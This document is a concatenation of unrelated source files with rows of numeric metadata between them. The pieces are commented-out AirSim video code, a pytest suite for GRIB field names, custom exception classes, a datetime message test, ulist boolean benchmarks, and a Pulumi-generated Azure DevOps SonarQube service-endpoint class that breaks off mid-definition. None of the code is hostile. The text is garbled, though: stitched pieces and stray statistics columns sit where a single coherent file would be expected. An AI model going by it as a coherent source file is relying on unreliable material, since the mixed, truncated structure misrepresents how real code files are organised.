# quad_pose = [state[0], state[1], state[2], -state[3], -state[4], state[5]]
# self.client.simSetVehiclePose(QuadPose(quad_pose), True)
# time.sleep(0.001)
# def get_video(self, algorithm):
# pathIn= self.base_path + 'images/'
# pathOut = self.base_path + algorithm + '_video.avi'
# fps = 0.5
# frame_array = []
# files = [f for f in os.listdir(pathIn) if isfile(join(pathIn, f))]#for sorting the file names properly
# files.sort(key = lambda x: x[5:-4])
# for i in range(len(files)):
# filename=pathIn + files[i]
# #reading each files
# img = cv2.imread(filename)
# height, width, layers = img.shape
# size = (width,height)
# #inserting the frames into an image array
# frame_array.append(img)
# out = cv2.VideoWriter(pathOut,cv2.VideoWriter_fourcc(*'DIVX'), fps, size)
# for i in range(len(frame_array)):
# # writing to a image array
# out.write(frame_array[i])
# out.release()
| 56.54536
| 260
| 0.546075
| 7,202
| 54,227
| 3.900028
| 0.063177
| 0.038735
| 0.051837
| 0.013351
| 0.843421
| 0.811343
| 0.794717
| 0.780867
| 0.759292
| 0.747152
| 0
| 0.033493
| 0.325521
| 54,227
| 958
| 261
| 56.604384
| 0.734463
| 0.369447
| 0
| 0.636771
| 0
| 0.029148
| 0.071412
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.071749
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbe93c747774c0062a1ad953e6a0fee126693c5d
| 3,959
|
py
|
Python
|
tests/format/grib/eccodes/field/test_field_name.py
|
perillaroc/nwpc-data
|
44d75011609e5d2d8bd8a704c7b529e0aceb7ed4
|
[
"Apache-2.0"
] | 3
|
2021-10-31T13:59:04.000Z
|
2022-03-08T06:45:41.000Z
|
tests/format/grib/eccodes/field/test_field_name.py
|
perillaroc/nwpc-data
|
44d75011609e5d2d8bd8a704c7b529e0aceb7ed4
|
[
"Apache-2.0"
] | null | null | null |
tests/format/grib/eccodes/field/test_field_name.py
|
perillaroc/nwpc-data
|
44d75011609e5d2d8bd8a704c7b529e0aceb7ed4
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from typing import Dict, Union, Optional
from dataclasses import dataclass, asdict
from reki.format.grib.eccodes import load_field_from_file
@dataclass
class QueryOption:
    """Keyword arguments forwarded to ``load_field_from_file`` via ``asdict``.

    All fields default to ``None`` (meaning "not specified"), so the
    annotations are ``Optional`` to match — the originals declared plain
    ``str``/``float`` while defaulting to ``None``.
    """
    parameter: Optional[Union[str, Dict]] = None   # field short name or GRIB key dict
    level_type: Optional[str] = None               # e.g. "pl", "sfc"
    level: Optional[float] = None                  # e.g. 850 for a pressure level
    field_name: Optional[str] = None               # overrides the loaded field's name
@dataclass
class TestCase:
    """Pairs a query with the name the loaded field is expected to carry."""
    # Class name matches pytest's default Test* collection pattern; this
    # flag stops pytest from trying (and warning) to collect it as a test.
    __test__ = False

    query: QueryOption
    expected_field_name: str
def test_parameter_string(file_path):
    """String parameters keep their name unless ``field_name`` overrides it.

    ``file_path`` is a fixture — presumably defined in a conftest; verify there.
    """
    # (parameter, field_name override, expected resulting name)
    cases = [
        ("t", None, "t"),
        ("t", "other_field_name", "other_field_name"),
        ("TMP", None, "TMP"),
        ("TMP", "other_field_name", "other_field_name"),
    ]
    for parameter, override, expected in cases:
        query = QueryOption(
            parameter=parameter, level_type="pl", level=850, field_name=override
        )
        field = load_field_from_file(file_path, **asdict(query))
        assert field is not None
        assert field.name == expected
def test_parameter_cemc_param_db(file_path):
    """Parameters resolved via the CEMC parameter DB keep their short name.

    ``file_path`` is a fixture — presumably defined in a conftest; verify there.
    """
    for parameter in ("btv", "zs"):
        query = QueryOption(parameter=parameter, field_name=None)
        field = load_field_from_file(file_path, **asdict(query))
        assert field is not None
        # With no field_name override, the loaded field is named after
        # the requested parameter itself.
        assert field.name == parameter
def test_parameter_dict(file_path):
    """GRIB-key dict parameters yield either a generated ``d_c_n`` style name,
    a known short name, or the explicit ``field_name`` override.

    ``file_path`` is a fixture — presumably defined in a conftest; verify there.
    """
    # (GRIB keys, level_type, level, field_name override, expected name)
    cases = [
        (dict(discipline=0, parameterCategory=2, parameterNumber=224), "pl", 850, None, "0_2_224"),
        (dict(discipline=0, parameterCategory=2, parameterNumber=224), "pl", 850, "other_field_name", "other_field_name"),
        (dict(discipline=0, parameterCategory=2, parameterNumber=227), "sfc", None, None, "0_2_227"),
        (dict(discipline=0, parameterCategory=2, parameterNumber=227), "sfc", None, "other_field_name", "other_field_name"),
        (dict(discipline=0, parameterCategory=5, parameterNumber=4), "sfc", None, None, "ulwrf"),
        (dict(discipline=0, parameterCategory=5, parameterNumber=4), "sfc", None, "other_field_name", "other_field_name"),
    ]
    for parameter, level_type, level, override, expected in cases:
        query = QueryOption(
            parameter=parameter,
            level_type=level_type,
            level=level,
            field_name=override,
        )
        field = load_field_from_file(file_path, **asdict(query))
        assert field is not None
        assert field.name == expected
| 29.766917
| 106
| 0.572367
| 414
| 3,959
| 5.181159
| 0.149758
| 0.163636
| 0.126807
| 0.184615
| 0.820047
| 0.820047
| 0.792075
| 0.792075
| 0.751049
| 0.731469
| 0
| 0.020564
| 0.336701
| 3,959
| 132
| 107
| 29.992424
| 0.796268
| 0
| 0
| 0.669492
| 0
| 0
| 0.056833
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 1
| 0.025424
| false
| 0
| 0.033898
| 0
| 0.127119
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dbf21a10cee00fba8c52f28cc9b7e5343e98400b
| 456
|
py
|
Python
|
profanity_police/exceptions.py
|
vivekkumar2696/profanity-police
|
18479e0ff4cc90bb226588c0e9962aea09570c52
|
[
"MIT"
] | 3
|
2021-06-21T21:22:19.000Z
|
2022-01-14T06:56:20.000Z
|
profanity_police/exceptions.py
|
vivekkumar2696/profanity-police
|
18479e0ff4cc90bb226588c0e9962aea09570c52
|
[
"MIT"
] | null | null | null |
profanity_police/exceptions.py
|
vivekkumar2696/profanity-police
|
18479e0ff4cc90bb226588c0e9962aea09570c52
|
[
"MIT"
] | null | null | null |
class InvalidYoutubeURLError(Exception):
    """Raised when a supplied YouTube URL cannot be parsed or recognized.

    Args:
        message: Human-readable description of the failure.
        errors: Optional underlying error details, kept for debugging.
    """

    def __init__(self, message, errors=None):
        super().__init__(message)
        # Preserve any underlying error payload for callers that need context.
        self.errors = errors
class TranscriptNotFoundError(Exception):
    """Raised when no transcript is available for the requested video.

    Args:
        message: Human-readable description of the failure.
        errors: Optional underlying error details, kept for debugging.
    """

    def __init__(self, message, errors=None):
        super().__init__(message)
        # Preserve any underlying error payload for callers that need context.
        self.errors = errors
class InvalidArgumentError(Exception):
    """Raised when a caller passes an argument the API cannot accept.

    Args:
        message: Human-readable description of the failure.
        errors: Optional underlying error details, kept for debugging.
    """

    def __init__(self, message, errors=None):
        super().__init__(message)
        # Preserve any underlying error payload for callers that need context.
        self.errors = errors
| 32.571429
| 47
| 0.682018
| 45
| 456
| 6.377778
| 0.266667
| 0.125436
| 0.167247
| 0.209059
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0.756098
| 0
| 0
| 0.212719
| 456
| 14
| 48
| 32.571429
| 0.799443
| 0
| 0
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e00435633525c33eb8bca2a05e93a197e4e0a743
| 990
|
py
|
Python
|
tests/test_fixture_msg.py
|
ddk50/upfg_rina
|
c6808ffec6dd8c84ab1c02721ab2b57f29a5283b
|
[
"MIT"
] | null | null | null |
tests/test_fixture_msg.py
|
ddk50/upfg_rina
|
c6808ffec6dd8c84ab1c02721ab2b57f29a5283b
|
[
"MIT"
] | null | null | null |
tests/test_fixture_msg.py
|
ddk50/upfg_rina
|
c6808ffec6dd8c84ab1c02721ab2b57f29a5283b
|
[
"MIT"
] | null | null | null |
import pytest
import datetime
from .context import Notifications
from .context import Msg
@pytest.fixture
def init():
    # Placeholder fixture: currently provides no setup state.
    return None
def test_one():
    # An event 23 hours from now should cause broadcast_or_not() to return
    # the message text. (Exact window semantics of Msg are not visible here;
    # the commented-out cases suggest hours=3 and hours=50 return None --
    # TODO confirm against Msg's implementation.)
    now = datetime.datetime.now()
    event_time = now + datetime.timedelta(hours=23)
    msg = Msg(event_time, "hello")
    r = msg.broadcast_or_not(now)
    assert r == "hello"
# def test_two():
# now = datetime.datetime.now()
# event_time = now + datetime.timedelta(hours=3)
# msg = Msg(event_time, "hello")
# r = msg.broadcast_or_not(now)
# assert r == None
# def test_three():
# now = datetime.datetime.now()
# event_time = now + datetime.timedelta(hours=50)
# msg = Msg(event_time, "hello")
# r = msg.broadcast_or_not(now)
# assert r == None
# def test_four():
# now = datetime.datetime.now()
# event_time = now + datetime.timedelta(hours=3)
# msg = Msg(event_time, "hello")
# r = msg.broadcast_or_not(now)
# assert r == None
| 20.625
| 53
| 0.614141
| 130
| 990
| 4.523077
| 0.238462
| 0.14966
| 0.129252
| 0.14966
| 0.755102
| 0.755102
| 0.755102
| 0.755102
| 0.755102
| 0.755102
| 0
| 0.008119
| 0.253535
| 990
| 47
| 54
| 21.06383
| 0.787551
| 0.581818
| 0
| 0
| 0
| 0
| 0.025381
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.153846
| false
| 0
| 0.307692
| 0.076923
| 0.538462
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e0517c6a70594814882908b23448e97ec139c388
| 2,512
|
py
|
Python
|
benchmark/boolean.py
|
tushushu/uvec
|
ab57251136d375a5e47a61af9a3262394795c0db
|
[
"BSD-3-Clause"
] | 7
|
2021-11-29T02:43:15.000Z
|
2022-01-03T13:59:11.000Z
|
benchmark/boolean.py
|
tushushu/uvec
|
ab57251136d375a5e47a61af9a3262394795c0db
|
[
"BSD-3-Clause"
] | 87
|
2022-01-10T13:15:23.000Z
|
2022-03-31T12:10:15.000Z
|
benchmark/boolean.py
|
tushushu/ulist
|
987d3a1bbcf2caab7ed2253d94921b1588e5175f
|
[
"BSD-3-Clause"
] | null | null | null |
from random import choice, seed
from ulist.utils import Benchmarker
seed(100)  # fixed RNG seed so benchmark inputs are reproducible across runs
class AllIsTrue(Benchmarker):
    """Benchmark `.all()` over all-True boolean lists of increasing size."""

    def cases(self) -> list:
        # One single-argument case per input size; every element is True.
        sizes = (100, 1000, 10000, 100000, 1000000)
        return [([True] * n,) for n in sizes]

    def ulist_fn(self, args) -> None:
        args[0].all()

    def other_fn(self, args) -> None:
        args[0].all()
class AndOp(Benchmarker):
    """Benchmark elementwise `&` over random boolean lists."""

    def cases(self) -> list:
        # One choice() call per element, in the same order as before, so the
        # seeded RNG stream (and therefore the data) is unchanged.
        sizes = (100, 1000, 10000, 100000, 1000000)
        return [([choice([False, True]) for _ in range(n)],) for n in sizes]

    def ulist_fn(self, args) -> None:
        args[0] & args[0]

    def other_fn(self, args) -> None:
        args[0] & args[0]
class AnyIsTrue(Benchmarker):
    """Benchmark `.any()` over all-False boolean lists of increasing size."""

    def cases(self) -> list:
        # One single-argument case per input size; every element is False.
        sizes = (100, 1000, 10000, 100000, 1000000)
        return [([False] * n,) for n in sizes]

    def ulist_fn(self, args) -> None:
        args[0].any()

    def other_fn(self, args) -> None:
        args[0].any()
class NotOp(Benchmarker):
    """Benchmark elementwise `~` over random boolean lists."""

    def cases(self) -> list:
        # One choice() call per element, in the same order as before, so the
        # seeded RNG stream (and therefore the data) is unchanged.
        sizes = (100, 1000, 10000, 100000, 1000000)
        return [([choice([False, True]) for _ in range(n)],) for n in sizes]

    def ulist_fn(self, args) -> None:
        ~(args[0])

    def other_fn(self, args) -> None:
        ~(args[0])
class OrOp(Benchmarker):
    """Benchmark elementwise `|` over random boolean lists."""

    def cases(self) -> list:
        # One choice() call per element, in the same order as before, so the
        # seeded RNG stream (and therefore the data) is unchanged.
        sizes = (100, 1000, 10000, 100000, 1000000)
        return [([choice([False, True]) for _ in range(n)],) for n in sizes]

    def ulist_fn(self, args) -> None:
        args[0] | args[0]

    def other_fn(self, args) -> None:
        args[0] | args[0]
| 27.604396
| 63
| 0.504777
| 299
| 2,512
| 4.123746
| 0.120401
| 0.101379
| 0.202758
| 0.227088
| 0.83455
| 0.774534
| 0.721006
| 0.711273
| 0.667478
| 0.667478
| 0
| 0.083187
| 0.320462
| 2,512
| 90
| 64
| 27.911111
| 0.639133
| 0
| 0
| 0.661765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.220588
| false
| 0
| 0.029412
| 0.073529
| 0.397059
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e065ba9590cb82972c71f3fb8a85de6fb174057e
| 19,017
|
py
|
Python
|
sdk/python/pulumi_azuredevops/service_endpoint_sonar_qube.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 13
|
2020-06-28T11:39:32.000Z
|
2022-03-05T13:34:16.000Z
|
sdk/python/pulumi_azuredevops/service_endpoint_sonar_qube.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 58
|
2020-06-20T14:00:28.000Z
|
2022-03-31T15:20:51.000Z
|
sdk/python/pulumi_azuredevops/service_endpoint_sonar_qube.py
|
pulumi/pulumi-azuredevops
|
e6d73d1501335037fb944ae627091a7afc7f0048
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-10-21T03:22:01.000Z
|
2021-12-10T18:26:59.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ServiceEndpointSonarQubeArgs', 'ServiceEndpointSonarQube']
# NOTE: generated by the Pulumi Terraform Bridge (tfgen, see file header);
# regenerate from the provider schema rather than hand-editing. Values are
# stored via pulumi.set/get so the SDK can track them as resource inputs.
@pulumi.input_type
class ServiceEndpointSonarQubeArgs:
    def __init__(__self__, *,
                 project_id: pulumi.Input[str],
                 service_endpoint_name: pulumi.Input[str],
                 token: pulumi.Input[str],
                 url: pulumi.Input[str],
                 authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 description: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a ServiceEndpointSonarQube resource.
        :param pulumi.Input[str] project_id: The project ID or project name.
        :param pulumi.Input[str] service_endpoint_name: The Service Endpoint name.
        :param pulumi.Input[str] token: Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
        :param pulumi.Input[str] url: URL of the SonarQube server to connect with.
        :param pulumi.Input[str] description: The Service Endpoint description.
        """
        pulumi.set(__self__, "project_id", project_id)
        pulumi.set(__self__, "service_endpoint_name", service_endpoint_name)
        pulumi.set(__self__, "token", token)
        pulumi.set(__self__, "url", url)
        # Optional inputs are only recorded when the caller supplied them.
        if authorization is not None:
            pulumi.set(__self__, "authorization", authorization)
        if description is not None:
            pulumi.set(__self__, "description", description)
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Input[str]:
        """
        The project ID or project name.
        """
        return pulumi.get(self, "project_id")
    @project_id.setter
    def project_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "project_id", value)
    @property
    @pulumi.getter(name="serviceEndpointName")
    def service_endpoint_name(self) -> pulumi.Input[str]:
        """
        The Service Endpoint name.
        """
        return pulumi.get(self, "service_endpoint_name")
    @service_endpoint_name.setter
    def service_endpoint_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "service_endpoint_name", value)
    @property
    @pulumi.getter
    def token(self) -> pulumi.Input[str]:
        """
        Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
        """
        return pulumi.get(self, "token")
    @token.setter
    def token(self, value: pulumi.Input[str]):
        pulumi.set(self, "token", value)
    @property
    @pulumi.getter
    def url(self) -> pulumi.Input[str]:
        """
        URL of the SonarQube server to connect with.
        """
        return pulumi.get(self, "url")
    @url.setter
    def url(self, value: pulumi.Input[str]):
        pulumi.set(self, "url", value)
    @property
    @pulumi.getter
    def authorization(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        return pulumi.get(self, "authorization")
    @authorization.setter
    def authorization(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "authorization", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The Service Endpoint description.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
# NOTE: generated state class (tfgen). Unlike the Args class, every field is
# optional here because state lookups may only know a subset of properties.
@pulumi.input_type
class _ServiceEndpointSonarQubeState:
    def __init__(__self__, *,
                 authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 service_endpoint_name: Optional[pulumi.Input[str]] = None,
                 token: Optional[pulumi.Input[str]] = None,
                 token_hash: Optional[pulumi.Input[str]] = None,
                 url: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering ServiceEndpointSonarQube resources.
        :param pulumi.Input[str] description: The Service Endpoint description.
        :param pulumi.Input[str] project_id: The project ID or project name.
        :param pulumi.Input[str] service_endpoint_name: The Service Endpoint name.
        :param pulumi.Input[str] token: Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
        :param pulumi.Input[str] token_hash: A bcrypted hash of the attribute 'token'
        :param pulumi.Input[str] url: URL of the SonarQube server to connect with.
        """
        # Only record the properties the caller actually supplied.
        if authorization is not None:
            pulumi.set(__self__, "authorization", authorization)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if project_id is not None:
            pulumi.set(__self__, "project_id", project_id)
        if service_endpoint_name is not None:
            pulumi.set(__self__, "service_endpoint_name", service_endpoint_name)
        if token is not None:
            pulumi.set(__self__, "token", token)
        if token_hash is not None:
            pulumi.set(__self__, "token_hash", token_hash)
        if url is not None:
            pulumi.set(__self__, "url", url)
    @property
    @pulumi.getter
    def authorization(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        return pulumi.get(self, "authorization")
    @authorization.setter
    def authorization(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "authorization", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The Service Endpoint description.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> Optional[pulumi.Input[str]]:
        """
        The project ID or project name.
        """
        return pulumi.get(self, "project_id")
    @project_id.setter
    def project_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "project_id", value)
    @property
    @pulumi.getter(name="serviceEndpointName")
    def service_endpoint_name(self) -> Optional[pulumi.Input[str]]:
        """
        The Service Endpoint name.
        """
        return pulumi.get(self, "service_endpoint_name")
    @service_endpoint_name.setter
    def service_endpoint_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "service_endpoint_name", value)
    @property
    @pulumi.getter
    def token(self) -> Optional[pulumi.Input[str]]:
        """
        Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
        """
        return pulumi.get(self, "token")
    @token.setter
    def token(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "token", value)
    @property
    @pulumi.getter(name="tokenHash")
    def token_hash(self) -> Optional[pulumi.Input[str]]:
        """
        A bcrypted hash of the attribute 'token'
        """
        return pulumi.get(self, "token_hash")
    @token_hash.setter
    def token_hash(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "token_hash", value)
    @property
    @pulumi.getter
    def url(self) -> Optional[pulumi.Input[str]]:
        """
        URL of the SonarQube server to connect with.
        """
        return pulumi.get(self, "url")
    @url.setter
    def url(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "url", value)
# NOTE: generated resource class (tfgen). The two @overload __init__
# signatures are typing-only; the real dispatcher is the bare __init__ below
# which routes to _internal_init via _utilities.get_resource_args_opts.
class ServiceEndpointSonarQube(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 service_endpoint_name: Optional[pulumi.Input[str]] = None,
                 token: Optional[pulumi.Input[str]] = None,
                 url: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a SonarQube service endpoint within Azure DevOps.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_azuredevops as azuredevops
        project = azuredevops.Project("project",
            visibility="private",
            version_control="Git",
            work_item_template="Agile")
        serviceendpoint = azuredevops.ServiceEndpointSonarQube("serviceendpoint",
            project_id=project.id,
            service_endpoint_name="Sample SonarQube",
            url="https://sonarqube.my.com",
            token="0000000000000000000000000000000000000000",
            description="Managed by Terraform")
        ```
        ## Relevant Links
        * [Azure DevOps Service Connections](https://docs.microsoft.com/en-us/azure/devops/pipelines/library/service-endpoints?view=azure-devops&tabs=yaml)
        * [SonarQube User Token](https://docs.sonarqube.org/latest/user-guide/user-token/)
        ## Import
        Azure DevOps Service Endpoint SonarQube can be imported using the **projectID/serviceEndpointID**, e.g.
        ```sh
        $ pulumi import azuredevops:index/serviceEndpointSonarQube:ServiceEndpointSonarQube serviceendpoint 00000000-0000-0000-0000-000000000000/00000000-0000-0000-0000-000000000000
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The Service Endpoint description.
        :param pulumi.Input[str] project_id: The project ID or project name.
        :param pulumi.Input[str] service_endpoint_name: The Service Endpoint name.
        :param pulumi.Input[str] token: Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
        :param pulumi.Input[str] url: URL of the SonarQube server to connect with.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ServiceEndpointSonarQubeArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a SonarQube service endpoint within Azure DevOps.
        ## Example Usage
        ```python
        import pulumi
        import pulumi_azuredevops as azuredevops
        project = azuredevops.Project("project",
            visibility="private",
            version_control="Git",
            work_item_template="Agile")
        serviceendpoint = azuredevops.ServiceEndpointSonarQube("serviceendpoint",
            project_id=project.id,
            service_endpoint_name="Sample SonarQube",
            url="https://sonarqube.my.com",
            token="0000000000000000000000000000000000000000",
            description="Managed by Terraform")
        ```
        ## Relevant Links
        * [Azure DevOps Service Connections](https://docs.microsoft.com/en-us/azure/devops/pipelines/library/service-endpoints?view=azure-devops&tabs=yaml)
        * [SonarQube User Token](https://docs.sonarqube.org/latest/user-guide/user-token/)
        ## Import
        Azure DevOps Service Endpoint SonarQube can be imported using the **projectID/serviceEndpointID**, e.g.
        ```sh
        $ pulumi import azuredevops:index/serviceEndpointSonarQube:ServiceEndpointSonarQube serviceendpoint 00000000-0000-0000-0000-000000000000/00000000-0000-0000-0000-000000000000
        ```
        :param str resource_name: The name of the resource.
        :param ServiceEndpointSonarQubeArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Runtime dispatcher: decide whether the caller used the Args-object
        # form or the keyword form, then forward to _internal_init.
        resource_args, opts = _utilities.get_resource_args_opts(ServiceEndpointSonarQubeArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 project_id: Optional[pulumi.Input[str]] = None,
                 service_endpoint_name: Optional[pulumi.Input[str]] = None,
                 token: Optional[pulumi.Input[str]] = None,
                 url: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ServiceEndpointSonarQubeArgs.__new__(ServiceEndpointSonarQubeArgs)
            __props__.__dict__["authorization"] = authorization
            __props__.__dict__["description"] = description
            # Required properties are only enforced when not adopting an
            # existing resource by URN.
            if project_id is None and not opts.urn:
                raise TypeError("Missing required property 'project_id'")
            __props__.__dict__["project_id"] = project_id
            if service_endpoint_name is None and not opts.urn:
                raise TypeError("Missing required property 'service_endpoint_name'")
            __props__.__dict__["service_endpoint_name"] = service_endpoint_name
            if token is None and not opts.urn:
                raise TypeError("Missing required property 'token'")
            __props__.__dict__["token"] = token
            if url is None and not opts.urn:
                raise TypeError("Missing required property 'url'")
            __props__.__dict__["url"] = url
            # token_hash is an output-only property computed by the provider.
            __props__.__dict__["token_hash"] = None
        super(ServiceEndpointSonarQube, __self__).__init__(
            'azuredevops:index/serviceEndpointSonarQube:ServiceEndpointSonarQube',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            authorization: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            description: Optional[pulumi.Input[str]] = None,
            project_id: Optional[pulumi.Input[str]] = None,
            service_endpoint_name: Optional[pulumi.Input[str]] = None,
            token: Optional[pulumi.Input[str]] = None,
            token_hash: Optional[pulumi.Input[str]] = None,
            url: Optional[pulumi.Input[str]] = None) -> 'ServiceEndpointSonarQube':
        """
        Get an existing ServiceEndpointSonarQube resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: The Service Endpoint description.
        :param pulumi.Input[str] project_id: The project ID or project name.
        :param pulumi.Input[str] service_endpoint_name: The Service Endpoint name.
        :param pulumi.Input[str] token: Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
        :param pulumi.Input[str] token_hash: A bcrypted hash of the attribute 'token'
        :param pulumi.Input[str] url: URL of the SonarQube server to connect with.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _ServiceEndpointSonarQubeState.__new__(_ServiceEndpointSonarQubeState)
        __props__.__dict__["authorization"] = authorization
        __props__.__dict__["description"] = description
        __props__.__dict__["project_id"] = project_id
        __props__.__dict__["service_endpoint_name"] = service_endpoint_name
        __props__.__dict__["token"] = token
        __props__.__dict__["token_hash"] = token_hash
        __props__.__dict__["url"] = url
        return ServiceEndpointSonarQube(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def authorization(self) -> pulumi.Output[Mapping[str, str]]:
        return pulumi.get(self, "authorization")
    @property
    @pulumi.getter
    def description(self) -> pulumi.Output[Optional[str]]:
        """
        The Service Endpoint description.
        """
        return pulumi.get(self, "description")
    @property
    @pulumi.getter(name="projectId")
    def project_id(self) -> pulumi.Output[str]:
        """
        The project ID or project name.
        """
        return pulumi.get(self, "project_id")
    @property
    @pulumi.getter(name="serviceEndpointName")
    def service_endpoint_name(self) -> pulumi.Output[str]:
        """
        The Service Endpoint name.
        """
        return pulumi.get(self, "service_endpoint_name")
    @property
    @pulumi.getter
    def token(self) -> pulumi.Output[str]:
        """
        Authentication Token generated through SonarQube (go to My Account > Security > Generate Tokens).
        """
        return pulumi.get(self, "token")
    @property
    @pulumi.getter(name="tokenHash")
